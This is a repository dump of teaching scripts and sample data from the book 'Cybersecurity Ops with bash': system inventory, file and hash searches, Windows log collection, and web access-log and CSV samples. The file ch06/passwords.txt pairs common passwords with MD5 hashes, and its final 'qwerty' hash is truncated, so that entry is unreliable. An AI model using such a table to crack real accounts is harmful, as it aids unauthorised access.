Repository: cybersecurityops/cyber-ops-with-bash
Branch: master
Commit: 84ccf91092e1
Files: 71
Total size: 123.7 KB

Directory structure:
gitextract_c6os0si7/
├── LICENSE
├── ch03/
│   ├── echoparams.sh
│   └── osdetect.sh
├── ch04/
│   └── frost.txt
├── ch05/
│   ├── cmds.txt
│   ├── cutfile.txt
│   ├── getlocal.sh
│   ├── hashsearch.sh
│   ├── typesearch.sh
│   └── winlogs.sh
├── ch06/
│   ├── accesstime.txt
│   ├── awkusers.txt
│   ├── book.json
│   ├── book.xml
│   ├── csvex.txt
│   ├── ips.txt
│   ├── passwords.txt
│   ├── procowner.txt
│   ├── tasks.txt
│   ├── user.txt
│   └── usernames.txt
├── ch07/
│   ├── access.log
│   ├── countem.awk
│   ├── countem.sh
│   ├── histogram.sh
│   ├── histogram_plain.sh
│   ├── pagereq.awk
│   ├── pagereq.sh
│   ├── summer.sh
│   ├── useragents.sh
│   └── useragents.txt
├── ch08/
│   ├── livebar.sh
│   ├── looper.sh
│   ├── tailcount.sh
│   └── wintail.sh
├── ch09/
│   ├── autoscan.sh
│   ├── fd2.sh
│   └── scan.sh
├── ch10/
│   └── baseline.sh
├── ch11/
│   ├── Calc_VT.txt
│   ├── WannaCry_VT.txt
│   ├── helloworld.c
│   ├── vtjson.awk
│   └── vtjson.sh
├── ch12/
│   ├── tagit.sh
│   ├── webdash.sh
│   └── weblogfmt.sh
├── ch13/
│   ├── bannergrabber.sh
│   └── smtpconnect.sh
├── ch14/
│   ├── askey.sh
│   ├── innerscript.sh
│   ├── logfuscate.sh
│   ├── oneline.sh
│   ├── readable.sh
│   ├── streamcipher.sh
│   ├── synfuscate.sh
│   └── wrapper.sh
├── ch15/
│   ├── fuzzer.sh
│   └── fuzzme.c
├── ch16/
│   ├── LocalRat.sh
│   └── RemoteRat.sh
├── ch19/
│   └── pingmonitor.sh
├── ch20/
│   └── softinv.sh
├── ch21/
│   ├── test.input
│   └── validateconfig.sh
├── ch22/
│   ├── checkemail.1liner
│   ├── checkemail.sh
│   ├── checkemailAlt.sh
│   ├── checkpass.sh
│   └── emailbatch.sh
└── readme.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2019 Cybersecurity Ops with bash

Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.

================================================
FILE: ch03/echoparams.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# echoparams.sh
#
# Description:
# Demonstrates accessing parameters in bash
#
# Usage:
# ./echoparams.sh
#

echo $#       # number of parameters
echo "$0"     # name of the script
echo "$1"     # first three positional parameters
echo "$2"
echo "$3"

================================================
FILE: ch03/osdetect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# osdetect.sh
#
# Description:
# Distinguish between MS-Windows/Linux/MacOS
#
# Usage: bash osdetect.sh
#   output will be one of: Linux MSWin macOS
#

if type -t wevtutil &> /dev/null           # <1>
then
    OS=MSWin
elif type -t scutil &> /dev/null           # <2>
then
    OS=macOS
else
    OS=Linux
fi
echo $OS

================================================
FILE: ch04/frost.txt
================================================
1 Two roads diverged in a yellow wood,
2 And sorry I could not travel both
3 And be one traveler, long I stood
4 And looked down one as far as I could
5 To where it bent in the undergrowth;
6
7 Excerpt from The Road Not Taken by Robert Frost

================================================
FILE: ch05/cmds.txt
================================================
#Linux Command   |MSWin Bash  |XML tag    |Purpose
#----------------+------------+-----------+------------------------------
uname -a         |uname -a    |uname      |O.S. version etc
cat /proc/cpuinfo|systeminfo  |sysinfo    |system hardware and related info
ifconfig         |ipconfig    |nwinterface|Network interface information
ip route         |route print |nwroute    |routing table
arp -a           |arp -a      |nwarp      |ARP table
netstat -a       |netstat -a  |netstat    |network connections
mount            |net share   |diskinfo   |mounted disks
ps -e            |tasklist    |processes  |running processes

================================================
FILE: ch05/cutfile.txt
================================================
12/05/2017 192.168.10.14 test.html
12/30/2017 192.168.10.185 login.html

================================================
FILE: ch05/getlocal.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# getlocal.sh
#
# Description:
# Gathers general system information and dumps it to a file
#
# Usage:
# bash getlocal.sh < cmds.txt
#   cmds.txt is a file with list of commands to run
#

# SepCmds - separate the commands from the line of input
function SepCmds()
{
    LCMD=${ALINE%%|*}                        # <11>
    REST=${ALINE#*|}                         # <12>
    WCMD=${REST%%|*}                         # <13>
    REST=${REST#*|}
    TAG=${REST%%|*}                          # <14>

    if [[ $OSTYPE == "MSWin" ]]
    then
        CMD="$WCMD"
    else
        CMD="$LCMD"
    fi
}

function DumpInfo ()
{                                            # <5>
    # record the collection date and time
    printf '%s %s\n' "$(date '+%F')" "$(date '+%T')"
    readarray CMDS                           # <6>
    for ALINE in "${CMDS[@]}"                # <7>
    do
        # ignore comments
        if [[ ${ALINE:0:1} == '#' ]] ; then continue ; fi   # <8>

        SepCmds

        if [[ ${CMD:0:3} == N/A ]]           # <9>
        then
            continue
        else
            # $TAG and $CMD stay unquoted: word splitting strips the
            # column padding and splits the command into its arguments
            printf "<%s>\n" $TAG             # <10>
            $CMD
            printf "</%s>\n" $TAG
        fi
    done
    printf "\n"
}

OSTYPE=$(./osdetect.sh)                      # <1>
HOSTNM=$(hostname)                           # <2>
TMPFILE="${HOSTNM}.info"                     # <3>

# gather the info into the tmp file; errors, too
DumpInfo > "$TMPFILE" 2>&1                   # <4>

================================================
FILE: ch05/hashsearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# hashsearch.sh
#
# Description:
# Recursively search a given directory for a file that
# matches a given SHA-1 hash
#
# Usage:
# hashsearch.sh <hash> <directory>
#   hash - SHA-1 hash value of file to find
#   directory - Top directory to start search
#

HASH=$1
DIR=${2:-.}     # default is here, cwd

# convert pathname into an absolute path
function mkabspath ()                        # <6>
{
    if [[ $1 == /* ]]                        # <7>
    then
        ABS=$1
    else
        ABS="$PWD/$1"                        # <8>
    fi
}

# quote pathnames and use read -r so names containing spaces
# or backslashes are handled intact
find "$DIR" -type f |                        # <1>
while read -r fn
do
    THISONE=$(sha1sum "$fn")                 # <2>
    THISONE=${THISONE%% *}                   # <3>
    if [[ $THISONE == "$HASH" ]]
    then
        mkabspath "$fn"                      # <4>
        echo "$ABS"                          # <5>
    fi
done

================================================
FILE: ch05/typesearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# typesearch.sh
#
# Description:
# Search the file system for a given file type. It prints out the
# pathname when found.
#
# Usage:
# typesearch.sh [-c dir] [-i] [-R|r] <pattern> <path>
#   -c Copy files found to dir
#   -i Ignore case
#   -R|r Recursively search subdirectories
#   <pattern> File type pattern to search for
#   <path> Path to start search
#

DEEPORNOT="-maxdepth 1"     # just the current dir; default

# PARSE option arguments:
while getopts 'c:irR' opt; do                    # <1>
  case "${opt}" in                               # <2>
    c) # copy found files to specified directory
       COPY=YES
       DESTDIR="$OPTARG"                         # <3>
       ;;
    i) # ignore u/l case differences in search
       CASEMATCH='-i'
       ;;
    [Rr]) # recursive                            # <4>
       unset DEEPORNOT;;                         # <5>
    *) # unknown/unsupported option              # <6>
       # error mesg will come from getopts, so just exit
       exit 2 ;;
  esac
done
shift $((OPTIND - 1))                            # <7>

PATTERN=${1:-PDF document}                       # <8>
STARTDIR=${2:-.}    # by default start here

# $DEEPORNOT and $CASEMATCH stay unquoted so that they expand to
# separate words (or to nothing); pathnames are quoted
find "$STARTDIR" $DEEPORNOT -type f | while read -r FN   # <9>
do
    file "$FN" | egrep -q $CASEMATCH "$PATTERN"  # <10>
    if (( $? == 0 ))   # found one               # <11>
    then
        echo "$FN"
        if [[ $COPY ]]                           # <12>
        then
            cp -p "$FN" "$DESTDIR"               # <13>
        fi
    fi
done

================================================
FILE: ch05/winlogs.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# winlogs.sh
#
# Description:
# Gather copies of Windows log files
#
# Usage:
# winlogs.sh [-z] [dir]
#   -z Tar and zip the output
#   dir Optional scratch directory for holding the log files

TGZ=0
if (( $# > 0 ))                              # <1>
then
    if [[ ${1:0:2} == '-z' ]]                # <2>
    then
        TGZ=1   # tgz flag to tar/zip the log files
        shift
    fi
fi
SYSNAM=$(hostname)
LOGDIR=${1:-/tmp/${SYSNAM}_logs}             # <3>

mkdir -p "$LOGDIR"                           # <4>
cd "${LOGDIR}" || exit -2

wevtutil el | while read ALOG                # <5>
do
    ALOG="${ALOG%$'\r'}"                     # <6>
    echo "${ALOG}:"                          # <7>
    SAFNAM="${ALOG// /_}"                    # <8>
    SAFNAM="${SAFNAM//\//-}"
    wevtutil epl "$ALOG" "${SYSNAM}_${SAFNAM}.evtx"
done

if (( TGZ == 1 ))                            # <9>
then
    tar -czvf "${SYSNAM}_logs.tgz" *.evtx    # <10>
fi

================================================
FILE: ch06/accesstime.txt
================================================
0745,file1.txt,1
0830,file4.txt,2
0830,file5.txt,3

================================================
FILE: ch06/awkusers.txt
================================================
Mike Jones
John Smith
Kathy Jones
Jane Kennedy
Tim Scott

================================================
FILE: ch06/book.json
================================================
{                                            <1>
  "title": "Cybersecurity Ops with bash",    <2>
  "edition": 1,
  "authors": [                               <3>
    {
      "firstName": "Paul",
      "lastName": "Troncone"
    },
    {
      "firstName": "Carl",
      "lastName": "Albing"
    }
  ]
}

================================================
FILE: ch06/book.xml
================================================
<1> <2> Paul <3> Troncone <4> Carl Albing

================================================
FILE: ch06/csvex.txt
================================================
"name","username","phone","password hash"
"John Smith","jsmith","555-555-1212",5f4dcc3b5aa765d61d8327deb882cf99
"Jane Smith","jnsmith","555-555-1234",e10adc3949ba59abbe56e057f20f883e
"Bill Jones","bjones","555-555-6789",d8578edf8458ce06fbc5bb76a58c5ca4

================================================
FILE: ch06/ips.txt
================================================
ip,OS
10.0.4.2,Windows 8
10.0.4.35,Ubuntu 16
10.0.4.107,macOS
10.0.4.145,macOS

================================================
FILE: ch06/passwords.txt
================================================
password,md5hash
123456,e10adc3949ba59abbe56e057f20f883e
password,5f4dcc3b5aa765d61d8327deb882cf99
welcome,40be4e59b9a2a2b5dffb918c0e86b3d7
ninja,3899dcbab79f92af727c2190bbd8abc5
abc123,e99a18c428cb38d5f260853678922e03
123456789,25f9e794323b453885f5181f1b624d0b
12345678,25d55ad283aa400af464c76d713c07ad
sunshine,0571749e2ac330a7455809c6b0e7af90
princess,8afa847f50a716e64932d995c8e7435a
qwerty,d8578edf8458ce06fbc5bb76a58c5c

================================================
FILE: ch06/procowner.txt
================================================
Process Owner;PID
jdoe;0
tjones;4
jsmith;340
msmith;528

================================================
FILE: ch06/tasks.txt
================================================
Image Name;PID;Session Name;Session#;Mem Usage
System Idle Process;0;Services;0;4 K
System;4;Services;0;2,140 K
smss.exe;340;Services;0;1,060 K
csrss.exe;528;Services;0;4,756 K

================================================
FILE: ch06/user.txt
================================================
user,ip
jdoe,10.0.4.2
jsmith,10.0.4.35
msmith,10.0.4.107
tjones,10.0.4.145

================================================
FILE: ch06/usernames.txt
================================================
1,jdoe
2,puser
3,jsmith

================================================
FILE: ch07/access.log
================================================
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /index.html HTTP/1.1" 200 6933 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265418 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /index.html HTTP/1.1" 200 6932 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19525 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /request-quote.html HTTP/1.1" 200 7326 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1386 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
